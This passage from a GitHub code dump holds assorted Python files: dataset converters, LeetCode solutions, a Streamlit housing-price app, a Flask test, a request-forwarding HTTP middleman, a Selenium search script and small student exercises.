relationship(\n\t\t'ProgramInstanceModel',\n\t\tback_populates='programs_sc',\n\t\tlazy='selectin',\n\t\tcascade='delete',\n\t)\n\n\tprogram_groups = relationship(\n\t\t'ProgramGroupModel',\n\t\tback_populates='programs_sc',\n\t\tlazy='selectin',\n\t\tcascade='delete',\n\t)\n\n\n\t__mapper_args__ = {\n\t\t'eager_defaults': True,\n\t}\n\n","repo_name":"Logicdraw/ahg-db-main","sub_path":"main/models/data/program/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72583512592","text":"import argparse\nimport os.path as osp\nfrom collections import defaultdict\n\nimport mmcv\nfrom tqdm import tqdm\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='LaSOT test dataset to COCO Video format')\n parser.add_argument(\n '-i',\n '--input',\n help='root directory of LaSOT test dataset',\n )\n parser.add_argument(\n '-o',\n '--output',\n help='directory to save coco formatted label file',\n )\n return parser.parse_args()\n\n\ndef convert_lasot_test(lasot_test, ann_dir, save_dir):\n \"\"\"Convert lasot dataset to COCO style.\n\n Args:\n lasot_test (dict): The converted COCO style annotations.\n ann_dir (str): The path of lasot test dataset\n save_dir (str): The path to save `lasot_test`.\n \"\"\"\n records = dict(vid_id=1, img_id=1, ann_id=1, global_instance_id=1)\n videos_list = osp.join(ann_dir, 'testing_set.txt')\n videos_list = mmcv.list_from_file(videos_list)\n\n lasot_test['categories'] = [dict(id=0, name=0)]\n\n for video_name in tqdm(videos_list):\n video_path = osp.join(ann_dir, video_name)\n video = dict(id=records['vid_id'], name=video_name)\n lasot_test['videos'].append(video)\n\n gt_bboxes = mmcv.list_from_file(\n osp.join(video_path, 'groundtruth.txt'))\n full_occlusion = mmcv.list_from_file(\n osp.join(video_path, 'full_occlusion.txt'))\n full_occlusion = full_occlusion[0].split(',')\n out_of_view = mmcv.list_from_file(\n osp.join(video_path, 'out_of_view.txt'))\n out_of_view = out_of_view[0].split(',')\n\n img = mmcv.imread(osp.join(video_path, 'img/00000001.jpg'))\n height, width, _ = img.shape\n for frame_id, gt_bbox in enumerate(gt_bboxes):\n file_name = '%08d' % (frame_id + 1) + '.jpg'\n file_name = osp.join(video_name, 'img', file_name)\n image = dict(\n file_name=file_name,\n height=height,\n width=width,\n id=records['img_id'],\n frame_id=frame_id,\n video_id=records['vid_id'])\n lasot_test['images'].append(image)\n\n x1, y1, w, h = gt_bbox.split(',')\n ann = dict(\n id=records['ann_id'],\n image_id=records['img_id'],\n instance_id=records['global_instance_id'],\n category_id=0,\n bbox=[int(x1), int(y1), int(w),\n int(h)],\n area=int(w) * int(h),\n full_occlusion=full_occlusion[frame_id] == '1',\n out_of_view=out_of_view[frame_id] == '1')\n lasot_test['annotations'].append(ann)\n\n records['ann_id'] += 1\n records['img_id'] += 1\n records['global_instance_id'] += 1\n records['vid_id'] += 1\n\n mmcv.dump(lasot_test, osp.join(save_dir, 'lasot_test.json'))\n print('-----LaSOT Test Dataset------')\n print(f'{records[\"vid_id\"]- 1} videos')\n print(f'{records[\"global_instance_id\"]- 1} instances')\n print(f'{records[\"img_id\"]- 1} images')\n print(f'{records[\"ann_id\"] - 1} objects')\n print('-----------------------------')\n\n\ndef main():\n args = parse_args()\n lasot_test = defaultdict(list)\n convert_lasot_test(lasot_test, args.input, args.output)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"goodproj13/TF-Blender","sub_path":"tools/convert_datasets/lasot2coco.py","file_name":"lasot2coco.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"83"} +{"seq_id":"27097719971","text":"class Solution:\n def trap(self, height: List[int]) -> int:\n\n n = len(height)\n \n prefixMax = [0] * n\n suffixMax = [0] * n\n \n prefixMax[ 0] = height[ 0]\n suffixMax[-1] = height[-1]\n \n for i in range(1, n):\n prefixMax[ i] = max(prefixMax[ i - 1], height[ i])\n suffixMax[~i] = max(suffixMax[~i + 1], height[~i])\n\n ans = 0\n for i in range(1, n - 1):\n ans += max(min(prefixMax[i - 1], suffixMax[i + 1]) - height[i], 0)\n \n return ans","repo_name":"ChengTsungPao/LeetCode","sub_path":"0042_Trapping_Rain_Water/code3.py","file_name":"code3.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"34940643620","text":"'''\nSource: Road Surface Wetness Variations.\n Based on the sensor developed by Haavasoja et al. \n The RCM411 road condition monitor sensor could \n measure water layer thickness from 0 to 3 milimeter. \n'''\n\nimport time\n\nclass WetnessDetector:\n def __init__(self):\n self.height = 0 # Height of water measured in milimeters\n \n def __str__(self): \n print(self.get_layer)\n\n def get_layer(self): \n return self.height\n\n def set_layer(self, height): # Updates the height value. \n if type(height) is not float:\n raise TypeError(\"Invalid value type, can only be a floating value or an integer value\\nWetness detector has stopped running.\")\n if height < 0: \n raise Exception(\"Invalid height, can not be a negative value\\nWetness detector has stopped running.\") \n self.height = height \n\n def run(self): # Continuously updates height value.\n while True:\n height = input()\n self.set_layer(height)\n time.sleep(30)\n\n\nif __name__ == '__main__': \n import random \n \n w = WetnessDetector()\n while True: \n height = float(random.randint(0, 10))\n print(height)\n w.set_layer(height)\n time.sleep(1)\n\n\n \n","repo_name":"UltraArceus3/HackUConn-HotSidewalks","sub_path":"src/WetnessDetection.py","file_name":"WetnessDetection.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70469924113","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nfrom app import db, create_app\nfrom app.models import Post\nimport time\n\nclass PostCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n p = Post(title='title', body='body')\n db.session.add(p)\n db.session.commit()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_post_basic(self):\n p = Post.query.first()\n self.assertTrue(p)\n self.assertTrue(p.timestamp)\n self.assertTrue(p.body)\n self.assertTrue(p.body_html)\n\n def test_on_change(self):\n p = Post.query.first()\n old_time = p.mtimestamp\n time.sleep(1)\n p.body = 'modified'\n db.session.add(p)\n db.session.commit()\n p = Post.query.first()\n self.assertTrue(p.body_html == '

modified

')\n self.assertTrue(p.mtimestamp != old_time)\n","repo_name":"fangjh13/Ftown","sub_path":"tests/test_post_models.py","file_name":"test_post_models.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"22266560670","text":"#################################### python-http-middleman ####################################\n# This is a simple python3 program that listens over HTTP for GET requests.\n# When it gets a request it puts it into a queue for later processing.\n# If the processing fails the request goes into a retry queue and tries again.\n# SQLite databases are used to persist the queues.\n# Secondary threads are used to handle the queues.\n# It takes a queue entry, removes some of the JSON that we don't want.\n# Only servers that are in the config file get requests forwarded to them.\n# This setup seems to be pretty good at handling lots of connections coming in quickly.\n# The request handler can take a while to catch up to tons of queued results, but it works.\n###############################################################################################\n\n# Requests get sent to: middleman.quade.co\n# URL format: https://middleman.quade.co/{destination_domain}/{destination_path}\n# Example old URL: https://sensorseed.quade.co/HomeOutsideWeatherStation/Data/Get?....\n# Example new URL: https://middleman.quade.co/sensorseed.quade.co/HomeOutsideWeatherStation/Data/Get?....\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport socketserver\nimport requests\nimport json\nimport queue\nfrom threading import Thread\nimport fnmatch\nimport time\nimport math\nfrom persistqueue import FIFOSQLiteQueue\n\nclass request_object:\n def __init__(self, command, path):\n self.command = command\n self.path = path\n\nclass retry_object:\n def __init__(self, request):\n self.request = request\n self.remaining_tries = 7\n self.last_run_time = time.time()\n\n# FIFO queues\nrequestsQ = FIFOSQLiteQueue(path=\"./requestsQ\", multithreading=True)\nretryQ = FIFOSQLiteQueue(path=\"./retryQ\", multithreading=True)\n\n# Send a get request to a server address\ndef sendget(request):\n try:\n address = request.path.split(\"/\")[1]\n path = request.path.replace(\"/\" + address + \"/\", \"/\")\n print(\"http://\" + address + path)\n r = requests.get(\"http://\" + address + path)\n return r.status_code\n except:\n return '503'\n\n# Handle the retry queue\ndef handleretries():\n while True:\n retry_data = retryQ.get()\n now = time.time()\n # Wait some time before retrying the request (factorial minutse of the number of tries that have been made: 1, 2, 6, 24, 120,...)\n if (now - retry_data.last_run_time) > (math.factorial(8 - retry_data.remaining_tries) * 60):\n print(\"Retrying to send request\")\n status_code = sendget(retry_data.request)\n # if the response isn't ok, decriment the retry count and requeue if there's a try left\n if int(status_code) != int('200'):\n retry_data.remaining_tries = retry_data.remaining_tries - 1\n print(\"Retry failed, tries left: \" + str(retry_data.remaining_tries));\n retry_data.last_run_time = now\n if retry_data.remaining_tries > 0:\n retryQ.put(retry_data)\n else:\n # Add back to end of queue if it isn't time yet\n # Always going through queue might not be the most efficient as the queue grows large, but it works\n retryQ.put(retry_data)\n\n# Handle the HTTP requests in the queue by routing the requests where they need to go\ndef handlerequests():\n while True:\n request = requestsQ.get()\n with open('config.json', 'r') as configFile:\n config_json = json.load(configFile)\n for server_element in config_json['servers']:\n # Make sure the server is in the config file\n if fnmatch.fnmatch(server_element['address'], request.path.split(\"/\")[1]):\n # send request, add to retry queue if fail\n status_code = sendget(request)\n print(status_code)\n if int(status_code) != int('200'):\n print(\"Adding request to retry queue\")\n retryQ.put(retry_object(request))\n break\n\n# Basic HTTP server class\nclass S(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n # Handle HTTP requests by putting them into a queue\n def do_POST(self):\n self._set_headers()\n self.wfile.write(\"wrong\".encode(\"utf-8\"))\n\n def do_GET(self): \n requestsQ.put(request_object(self.command, self.path))\n print(\"queued request\") \n self._set_headers()\n self.wfile.write(\"ok\".encode(\"utf-8\"))\n\n# Run the HTTP server on all addresses on a specific port\ndef runserver(server_class=HTTPServer, handler_class=S, port=8123):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print('Starting httpd...')\n httpd.serve_forever()\n\n# main(): setup a second thread to handle the server request queue, and start the HTTP server\nif __name__ == \"__main__\":\n from sys import argv\n\n requestworker = Thread(target=handlerequests)\n requestworker.setDaemon(True)\n requestworker.start()\n\n retryworker = Thread(target=handleretries)\n retryworker.setDaemon(True)\n retryworker.start()\n\n runserver()\n","repo_name":"wdq/csce462","sub_path":"python-http-middleman/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13001025144","text":"import time\r\nfrom selenium import webdriver\r\nimport gkeepapi\r\nimport signal\r\nimport os\r\nimport account\r\n\r\nkeep = gkeepapi.Keep()\r\naccount = keep.login(account.user_id,account.password)\r\n\r\nkeywords =[]\r\nkeywords = keep.find(query='keyword')\r\n\r\n\r\nfor search_word in keywords:\r\n try:\r\n word = search_word.text\r\n driver = webdriver.Chrome(\"c:/driver/chromedriver.exe\")\r\n driver.get('https://www.google.com/')\r\n time.sleep(1)\r\n\r\n search_box = driver.find_element_by_name(\"q\")\r\n search_box.send_keys(word)\r\n search_box.submit()\r\n time.sleep(2)\r\n finally:\r\n os.kill(driver.service.process.pid,signal.SIGTERM)\r\n\r\n\r\n","repo_name":"wb159357/portfolio","sub_path":"memo_app/memo_app.py","file_name":"memo_app.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17419207574","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:\n\nfrom easyai.base_name.model_name import ModelName\nfrom easyai.base_name.block_name import NormalizationType, ActivationType\nfrom easyai.base_name.block_name import LayerType, BlockType\nfrom easyai.base_name.loss_name import LossType\nfrom easyai.loss.utility.cross_entropy2d import CrossEntropy2d\nfrom easyai.model.base_block.utility.upsample_layer import Upsample\nfrom easyai.model.base_block.utility.utility_layer import RouteLayer\nfrom easyai.model.base_block.utility.utility_block import ConvBNActivationBlock\nfrom easyai.model.base_block.utility.utility_block import ConvActivationBlock\nfrom easyai.model.backbone.cls.mobilenetv2 import MobileNetV2\nfrom easyai.model.utility.base_model import *\n\n\nclass MobileV2FCN(BaseModel):\n\n def __init__(self, data_channel=3, class_num=2):\n super().__init__()\n self.set_name(ModelName.MobileV2FCN)\n self.class_number = class_num\n self.bn_name = NormalizationType.BatchNormalize2d\n self.activation_name = ActivationType.ReLU\n\n self.create_block_list()\n\n def create_block_list(self):\n self.block_out_channels = []\n self.index = 0\n\n basic_model = MobileNetV2(bnName=self.bn_name, activationName=self.activation_name)\n base_out_channels = basic_model.get_outchannel_list()\n self.add_block_list(BlockType.BaseNet, basic_model, base_out_channels[-1])\n\n input_channel = self.block_out_channels[-1]\n output_channel = base_out_channels[-1] // 2\n self.make_conv_block(input_channel, output_channel)\n\n self.make_layer(base_out_channels, output_channel, 2, '13')\n\n input_channel = self.block_out_channels[-1]\n output_channel = base_out_channels[-1] // 4\n self.make_conv_block(input_channel, output_channel)\n\n self.make_layer(base_out_channels, output_channel, 2, '6')\n\n input_channel = self.block_out_channels[-1]\n output_channel = base_out_channels[-1] // 8\n self.make_conv_block(input_channel, output_channel)\n\n self.make_layer(base_out_channels, output_channel, 2, '3')\n\n input_channel = self.block_out_channels[-1]\n output_channel = base_out_channels[-1] // 16\n self.make_conv_block(input_channel, output_channel)\n\n input_channel = self.block_out_channels[-1]\n output_channel = self.class_number\n conv4 = ConvActivationBlock(input_channel, output_channel,\n kernel_size=1, stride=1, padding=0,\n activationName=ActivationType.Linear)\n self.add_block_list(conv4.get_name(), conv4, output_channel)\n\n layer10 = Upsample(scale_factor=4, mode='bilinear')\n self.add_block_list(layer10.get_name(), layer10, self.block_out_channels[-1])\n\n self.create_loss()\n\n def create_loss(self, input_dict=None):\n self.lossList = []\n loss = CrossEntropy2d(ignore_index=250)\n self.add_block_list(LossType.CrossEntropy2d, loss, self.block_out_channels[-1])\n self.lossList.append(loss)\n\n def make_layer(self, base_out_channels, conv_output_channel, scale_factor, route_layer_indexs):\n layer1 = Upsample(scale_factor=scale_factor, mode='bilinear')\n self.add_block_list(layer1.get_name(), layer1, self.block_out_channels[-1])\n\n layer2 = RouteLayer(route_layer_indexs)\n output_channel = sum([base_out_channels[i] if i >= 0\n else self.block_out_channels[i] for i in layer2.layers])\n self.add_block_list(layer2.get_name(), layer2, output_channel)\n\n conv1 = ConvBNActivationBlock(self.block_out_channels[-1], conv_output_channel,\n kernel_size=1, stride=1, padding=0,\n bnName=self.bn_name, activationName=self.activation_name)\n self.add_block_list(conv1.get_name(), conv1, conv_output_channel)\n\n layer3 = RouteLayer('-1,-3')\n output_channel = sum([base_out_channels[i] if i >= 0 else\n self.block_out_channels[i] for i in layer3.layers])\n self.add_block_list(layer3.get_name(), layer3, output_channel)\n\n def make_conv_block(self, input_channel, output_channel):\n conv1 = ConvBNActivationBlock(input_channel, output_channel,\n kernel_size=1, stride=1, padding=0,\n bnName=self.bn_name, activationName=self.activation_name)\n self.add_block_list(conv1.get_name(), conv1, output_channel)\n\n temp_input_channel = self.block_out_channels[-1]\n temp_output_channel = output_channel * 2\n conv2 = ConvBNActivationBlock(temp_input_channel, temp_output_channel,\n kernel_size=3, stride=1, padding=1,\n bnName=self.bn_name, activationName=self.activation_name)\n self.add_block_list(conv2.get_name(), conv2, temp_output_channel)\n\n temp_input_channel = self.block_out_channels[-1]\n temp_output_channel = output_channel\n conv3 = ConvBNActivationBlock(temp_input_channel, temp_output_channel,\n kernel_size=1, stride=1, padding=0,\n bnName=self.bn_name, activationName=self.activation_name)\n self.add_block_list(conv3.get_name(), conv3, temp_output_channel)\n\n def forward(self, x):\n base_outputs = []\n layer_outputs = []\n output = []\n for key, block in self._modules.items():\n if BlockType.BaseNet in key:\n base_outputs = block(x)\n x = base_outputs[-1]\n elif LayerType.RouteLayer in key:\n x = block(layer_outputs, base_outputs)\n elif LayerType.ShortcutLayer in key:\n x = block(layer_outputs)\n elif LossType.YoloLoss in key:\n output.append(x)\n elif LossType.CrossEntropy2d in key:\n output.append(x)\n else:\n x = block(x)\n layer_outputs.append(x)\n return output\n","repo_name":"lpj0822/image_point_cloud_det","sub_path":"easyai/model/seg/mobilev2_fcn_seg.py","file_name":"mobilev2_fcn_seg.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"74358338511","text":"import streamlit as st\r\nimport pandas as pd\r\nimport shap\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nimage = Image.open('logo.png')\r\ncola, colb, colc = st.columns([3,6,1])\r\nwith cola:\r\n st.write(\"\")\r\n\r\nwith colb:\r\n st.image(image, width = 300)\r\n\r\nwith colc:\r\n st.write(\"\")\r\nmenu = [\"Home\",\"About\"]\r\nchoice = st.sidebar.selectbox(\"Menu\",menu)\r\nif choice == \"Home\":\r\n st.write(\"\"\"\r\n # Boston House Price Prediction App\r\n\r\n This app predicts the **Boston House Price**!\r\n \"\"\")\r\n st.write('---')\r\n\r\n # Loads the Boston House Price Dataset\r\n boston = datasets.load_boston()\r\n X = pd.DataFrame(boston.data, columns=boston.feature_names)\r\n Y = pd.DataFrame(boston.target, columns=[\"MEDV\"])\r\n st.write(\"\"\"\r\n **THE DATASET DATA** \\n\r\n Data description \\n\r\n The Boston data frame has 506 rows and 14 columns.This data frame contains the following columns:\\n\r\n crim: per capita crime rate by town,\\n\r\n zn: proportion of residential land zoned for lots over 25,000 sq.ft,\\n\r\n indus: proportion of non-retail business acres per town,\\n\r\n chas: Charles River dummy variable (= 1 if tract bounds river; 0 otherwise),\\n\r\n nox: nitrogen oxides concentration (parts per 10 million),\\n\r\n rm: average number of rooms per dwelling,\\n\r\n age: proportion of owner-occupied units built prior to 1940,\\n\r\n dis: weighted mean of distances to five Boston employment centres,\\n\r\n rad: index of accessibility to radial highways,\\n\r\n tax: full-value property-tax rate per \\$10,000,\\n\r\n ptratio: pupil-teacher ratio by town,\\n\r\n black: 1000(Bk - 0.63)^2 where Bk is the proportion of blacks by town,\\n\r\n lstat: lower status of the population (percent).\\n\r\n \"\"\")\r\n st.write(X)\r\n st.write(\"\"\"\r\n **THE DATASET LABELS**\r\n medv:median value of owner-occupied homes in \\$1000s.\r\n \"\"\")\r\n st.write(Y)\r\n # Sidebar\r\n # Header of Specify Input Parameters\r\n st.sidebar.header('Specify Input Parameters')\r\n\r\n def user_input_features():\r\n CRIM = st.sidebar.slider('CRIM', float(X.CRIM.min()), float(X.CRIM.max()), float(X.CRIM.mean()))\r\n ZN = st.sidebar.slider('ZN', float(X.ZN.min()), float(X.ZN.max()), float(X.ZN.mean()))\r\n INDUS = st.sidebar.slider('INDUS', float(X.INDUS.min()), float(X.INDUS.max()), float(X.INDUS.mean()))\r\n CHAS = st.sidebar.slider('CHAS', float(X.CHAS.min()), float(X.CHAS.max()), float(X.CHAS.mean()))\r\n NOX = st.sidebar.slider('NOX', float(X.NOX.min()), float(X.NOX.max()), float(X.NOX.mean()))\r\n RM = st.sidebar.slider('RM', float(X.RM.min()), float(X.RM.max()), float(X.RM.mean()))\r\n AGE = st.sidebar.slider('AGE', float(X.AGE.min()), float(X.AGE.max()), float(X.AGE.mean()))\r\n DIS = st.sidebar.slider('DIS', float(X.DIS.min()), float(X.DIS.max()), float(X.DIS.mean()))\r\n RAD = st.sidebar.slider('RAD', float(X.RAD.min()), float(X.RAD.max()), float(X.RAD.mean()))\r\n TAX = st.sidebar.slider('TAX', float(X.TAX.min()), float(X.TAX.max()), float(X.TAX.mean()))\r\n PTRATIO = st.sidebar.slider('PTRATIO', float(X.PTRATIO.min()), float(X.PTRATIO.max()), float(X.PTRATIO.mean()))\r\n B = st.sidebar.slider('B', float(X.B.min()), float(X.B.max()), float(X.B.mean()))\r\n LSTAT = st.sidebar.slider('LSTAT', float(X.LSTAT.min()), float(X.LSTAT.max()), float(X.LSTAT.mean()))\r\n data = {'CRIM': CRIM,\r\n 'ZN': ZN,\r\n 'INDUS': INDUS,\r\n 'CHAS': CHAS,\r\n 'NOX': NOX,\r\n 'RM': RM,\r\n 'AGE': AGE,\r\n 'DIS': DIS,\r\n 'RAD': RAD,\r\n 'TAX': TAX,\r\n 'PTRATIO': PTRATIO,\r\n 'B': B,\r\n 'LSTAT': LSTAT}\r\n features = pd.DataFrame(data, index=[0])\r\n return features\r\n\r\n df = user_input_features()\r\n\r\n # Main Panel\r\n\r\n # Print specified input parameters\r\n st.header('Specified Input parameters')\r\n st.write(df)\r\n st.write('---')\r\n\r\n # Build Regression Model\r\n model = RandomForestRegressor()\r\n model.fit(X, Y)\r\n # Apply Model to Make Prediction\r\n prediction = model.predict(df)\r\n\r\n st.header('Prediction of MEDV')\r\n st.write(prediction)\r\n st.write('---')\r\n\r\n # Explaining the model's predictions using SHAP values\r\n # https://github.com/slundberg/shap\r\n explainer = shap.TreeExplainer(model)\r\n shap_values = explainer.shap_values(X)\r\n\r\n st.header('Feature Importance')\r\n f, ax = plt.subplots()\r\n ax.set_title('Feature importance based on SHAP values')\r\n shap.summary_plot(shap_values, X)\r\n st.pyplot(f,bbox_inches='tight')\r\n st.write('---')\r\n\r\n f, ax = plt.subplots()\r\n ax.set_title('Feature importance based on SHAP values (Bar)')\r\n shap.summary_plot(shap_values, X, plot_type=\"bar\")\r\n st.pyplot(f,bbox_inches='tight')\r\nelse:\r\n st.subheader(\"About\")\r\n st.write(\"With a hybrid profile of data science and computer science, I’m pursuing a career in AI-driven firms. I believe in dedication, discipline, and creativity towards my job, which will be helpful in meeting your firm's requirements as well as my personal development.\")\r\n st.write(\"Check out this project's [Github](https://github.com/bashirsadat/boston-house-ml-app)\")\r\n st.write(\" My [Linkedin](https://www.linkedin.com/in/saadaat/)\")\r\n st.write(\"See my other projects [LinkTree](https://linktr.ee/saadaat)\")\r\n","repo_name":"bashirsadat/boston-house-ml-app","sub_path":"boston-house-ml-app.py","file_name":"boston-house-ml-app.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19125533671","text":"def med_of_two_sorted(x,y):\n\n l=x+y\n n= len(l)\n\n if n % 2 == 0:\n med1 = l[n//2]\n med2 = l[n//2 - 1]\n median = (med1+med2)/2\n else:\n median = l[n//2]\n\n return (\"the median of the given arrays is {}\".format(median))\n\n\nx = list(map(int, input().rstrip().split()))\ny = list(map(int, input().rstrip().split()))\nprint(med_of_two_sorted(x,y))\n","repo_name":"Dharanidharan2001/cse","sub_path":"python/median_of_two_sorted_array.py","file_name":"median_of_two_sorted_array.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24972539110","text":"\n\nfrom collections import deque\n\n\ndx , dy = [-1,1,0,0],[0,0,-1,1]\n\ndef saveBomb():\n for i in range(r):\n for j in range(c):\n if map[i][j]!='.':\n bombList.append((i,j)) #폭탄 좌표 저장\n\n\ndef insertBomb():\n for i in range(r):\n for j in range(c):\n if map[i][j]!='0':\n map[i][j]='0'\n\n\ndef bomb():\n while bombList:\n x,y =bombList.popleft()\n map[x][y]='.'\n for i in range(4): #앞뒤양옆 폭탄 터짐\n nx, ny= x+dx[i], y+dy[i]\n if 0<=nx< r and 0 <= ny0 : \n saveBomb()\n insertBomb()\n time-=1 #1초동안 폭탄 설치\n if time==0:\n break\n bomb()\n time-=1 #3초전 설치된 폭탄이 모두 폭발\n\n printMap()","repo_name":"YAPP-Github/20th-Study-Algorithm-2","sub_path":"src/seonyoung/3week/봄버맨.py","file_name":"봄버맨.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"26571343377","text":"def check_valid_input(letter_guessed,old_letters_guessed):\n if(len(a)>1):\n if(not a.isalnum()):\n return \"X\";\n else:\n old_letters_guessed+=a;\n else:\n if(not a.isalnum()):\n old_letters_guessed+=a;\n else:\n return True; \n\ndef print_welcome_prompt():\n HANGMAN_ASCII_ART = ''' _ _ \n | | | | \n | |__| | __ _ _ __ __ _ _ __ ___ __ _ _ __ \n | __ |/ _` | '_ \\ / _` | '_ ` _ \\ / _` | '_ \\ \n | | | | (_| | | | | (_| | | | | | | (_| | | | |\n |_| |_|\\__,_|_| |_|\\__, |_| |_| |_|\\__,_|_| |_|\n __/ | \n |___/ '''\n\nprint(HANGMAN_ASCII_ART)\nMAX_TRIES = 6\nprint(\"You have\",MAX_TRIES,\"tries\")\n\n\n# word = input(\"Please insert a word: \")\n# print(word)\n# print(\"_ _ _ _ _ _\")\na = input(\"Guess a letter: \")\nprint(is_valid_input(a))\n","repo_name":"KobiShashs/Python","sub_path":"11_Hangman/7_main.py","file_name":"7_main.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22449224960","text":"from typing import Callable\nimport numpy as np\nVSML = 1e-8\n\n\ndef get_logistic_func(alpha: float) -> Callable[[float], float]:\n return lambda x: 1. / (1 + np.exp(-alpha * x))\n\n\ndef get_unit_sigmoid_func(alpha: float) -> Callable[[float], float]:\n return lambda x: 1. / (1 + (1 / np.where(x == 0, VSML, x) - 1) ** alpha)\n\n\nif __name__ == '__main__':\n from rl.gen_utils.plot_funcs import plot_list_of_curves\n alpha = [2.0, 1.0, 0.5]\n colors = [\"r-\", \"b--\", \"g-.\"]\n labels = [(r\"$\\alpha$ = %.1f\" % a) for a in alpha]\n logistics = [get_logistic_func(a) for a in alpha]\n x_vals = np.arange(-3.0, 3.01, 0.05)\n y_vals = [f(x_vals) for f in logistics]\n plot_list_of_curves(\n [x_vals] * len(logistics),\n y_vals,\n colors,\n labels,\n title=\"Logistic Functions\"\n )\n\n alpha = [2.0, 1.0, 0.5]\n colors = [\"r-\", \"b--\", \"g-.\"]\n labels = [(r\"$\\alpha$ = %.1f\" % a) for a in alpha]\n unit_sigmoids = [get_unit_sigmoid_func(a) for a in alpha]\n x_vals = np.arange(0.0, 1.01, 0.01)\n y_vals = [f(x_vals) for f in unit_sigmoids]\n plot_list_of_curves(\n [x_vals] * len(logistics),\n y_vals,\n colors,\n labels,\n title=\"Unit-Sigmoid Functions\"\n )\n","repo_name":"TikhonJelvis/RL-book","sub_path":"rl/gen_utils/common_funcs.py","file_name":"common_funcs.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":410,"dataset":"github-code","pt":"83"} +{"seq_id":"12912556260","text":"#\n# @lc app=leetcode id=1786 lang=python3\n#\n# [1786] Number of Restricted Paths From First to Last Node\n#\n\n# @lc code=start\nfrom collections import deque\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n '''\n First build the graph\n Dijkstra from n to every point, record the distanceToLastNode(x) in an array\n Then we calculate number of paths starting from node 0 and reaching each node [i]\n '''\n def Dijkstra(self, graph, source):\n n = len(graph)\n result = [-1] * n\n heap = []\n visited = [False]*n\n visitedCount = 0\n heapq.heappush(heap, [0, source])\n\n while heap and visitedCount < n:\n weight, node = heapq.heappop(heap)\n if result[node] < 0:\n result[node] = weight\n visited[node] = True\n visitedCount += 1\n for nxt in graph[node].keys():\n heapq.heappush(heap, [weight + graph[node][nxt], nxt]) \n return result\n \n def countRestrictedPaths(self, n: int, edges: List[List[int]]) -> int:\n MOD = pow(10, 9) + 7\n\n graph = [{} for i in range(n)]\n for a, b, w in edges:\n graph[a - 1][b - 1] = w\n graph[b - 1][a - 1] = w\n \n distanceToLastNode = self.Dijkstra(graph, n - 1)\n distanceToLastNodeSorted = sorted(list(enumerate(distanceToLastNode)), key = lambda x: - x[1])\n result = [0] * n\n result[0] = 1\n i = 0\n while distanceToLastNodeSorted[i][0] != 0:\n i += 1\n \n for j in range(i, n):\n for nxt in graph[distanceToLastNodeSorted[j][0]]:\n if distanceToLastNode[nxt] < distanceToLastNodeSorted[j][1]:\n result[nxt] += result[distanceToLastNodeSorted[j][0]]\n result[nxt] %= MOD\n return result[-1]\n# @lc code=end\n\n","repo_name":"huikinglam02gmail/Leetcode_solutions","sub_path":"1786.number-of-restricted-paths-from-first-to-last-node.py","file_name":"1786.number-of-restricted-paths-from-first-to-last-node.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14969680035","text":"from django.urls.conf import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom personal.views import (CountyViewSet, DistrictViewSet, ProfileViewSet,\n SchoolViewSet)\n\nrouter = DefaultRouter()\nrouter.register(r'counties', CountyViewSet)\nrouter.register(r'districts', DistrictViewSet)\nrouter.register(r'schools', SchoolViewSet)\nrouter.register(r'profiles', ProfileViewSet)\n\napp_name = \"profile\"\n\nurlpatterns = [\n path('', include(router.urls)),\n]\n","repo_name":"ZdruzenieSTROM/webstrom-backend","sub_path":"personal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} +{"seq_id":"44801389984","text":"#!/usr/bin/env python\r\n\r\n\"\"\"naive_with_counts.py: naive exact matching with the number of character comparisons performed and the number of alignments 